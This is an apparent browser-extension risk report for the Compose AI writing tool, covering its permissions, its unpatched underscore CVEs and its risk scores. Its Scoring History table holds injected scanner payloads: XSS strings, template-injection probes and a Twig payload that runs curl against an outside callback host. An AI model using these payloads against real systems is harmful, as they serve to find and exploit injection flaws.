Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Compose AI: AI-powered Writing Tool

ddlbpiadoechcolndfeaonajmngmhblj
Risk Score
7.52
Risk Level: High
Recommendation: 🚫 BLOCK
Category AI
Installs 300,000
Rating 4.1
Last updated 2025-01-02 (19 months ago)
Manifest version MV3
CSP present ✅ yes
Developer support@compose.ai
Verified publisher ✅ yes
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • MANAGEMENT PERMISSION: extension can enumerate and disable other installed extensions (incl. security and privacy tools).
  • Critical CVE in bundled underscore@1.8.3 (CVE-2021-23358: Arbitrary Code Execution) — unpatched, fixed_in 1.12.1
  • Dynamic script injection (script_src_dynamic) + new Function() constructor in Gmail/Docs injectors — remote code execution surface
  • Privacy policy fetched but scope_extension==false with data_collection+third_party_sharing==true — ADMITS broad data sharing without extension scoping
  • Broad host access (http://*/*, https://*/*) combined with webRequest and management permissions

Evidence

  • critical_cve_bundled_lib crx underscore@1.8.3 has CVE-2021-23358 (critical, ACE); fixed in 1.12.1 — not updated.
  • dynamic_script_injection crx script_src_dynamic found in 5 JS files including Gmail and Docs injectors.
  • function_constructor crx new Function() constructor present in 5 JS files; elevated code execution risk.
  • privacy_policy_scope_mismatch store Policy fetched but scope_extension=false; admits data_collection+third_party_sharing without extension-specific scope.
  • broad_host_access_plus_webrequest manifest http://*/*, https://*/* host perms combined with webRequest and management permissions.
  • verified_publisher_featured store Verified publisher + featured by Google; discount capped at -1.0 due to stale (17mo) + CVEs (invariant 0c/0e).
  • maintenance_stale store Last updated Jan 2025, 17 months ago; vulnerable lib unpatched in that window.
  • ai_extension_broad_content_scripts manifest AI writing tool with content scripts on Gmail, Docs, LinkedIn, WhatsApp, Outlook plus http/https wildcard.

CVE Exposures (2)

CVELibrarySeverity Fixed inSummary
CVE-2021-23358 underscore@1.8.3 critical 1.12.1 Arbitrary Code Execution in underscore
CVE-2026-27601 underscore@1.8.3 high 1.13.8 Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS

Permissions Breakdown

  • scripting medium Can inject scripts into pages; paired with broad host access elevates risk.
  • tabs medium Access to tab URLs, titles and navigation data.
  • webNavigation medium Monitors all navigation events across all sites.
  • management high Can list/disable/enable other installed extensions.
  • alarms low Scheduled tasks; minimal standalone risk.
  • clipboardWrite medium Can write to clipboard silently.
  • storage low Local extension data storage.
  • webRequest high Observes all network requests across broad host access.
  • http://*/* high Broad host access across all HTTP sites.
  • https://*/* high Broad host access across all HTTPS sites.

Pillar Scores

Permissions7.50
Reputation2.00
Network2.00
Webstore3.50
Maintenance6.00
Privacy10.00
Code Quality7.50
CVE Exposure7.00

Scoring History

sssieddrubricxsx 7.00 High block 2026-08-08
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 7.27 High block 2026-08-05
v3.6'"()&%<zzz><ScRiPt >Ueve(9993)</ScRiPt> 8.05 Critical block 2026-08-05
v3.6&n903869=v932453 7.00 High block 2026-08-05
v3.6&n938936=v972751 7.73 High block 2026-08-04
v3.6"sTYLe='zzz:Expre/**/SSion(BDmZ(9178))'bad=" 7.00 High block 2026-07-29
v3.6"onmouseover=BDmZ(98342)" 7.00 High block 2026-07-29
<th:t="${dfb}#foreach 7.43 High block 2026-07-29
dfb[[${98991*97996}]]xca 7.00 High block 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitthrchoewes1518f.bxss.me")}} 7.27 High block 2026-07-29
v1 7.00 High block 2026-07-02
v3.6 7.52 High block 2026-06-16
v3.4-rev 5.38 Medium review 2026-06-15

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:26
Listing SHA bcfe2a9fdf64…
Force block — not fired
Score recovered no
Elapsed 52.0s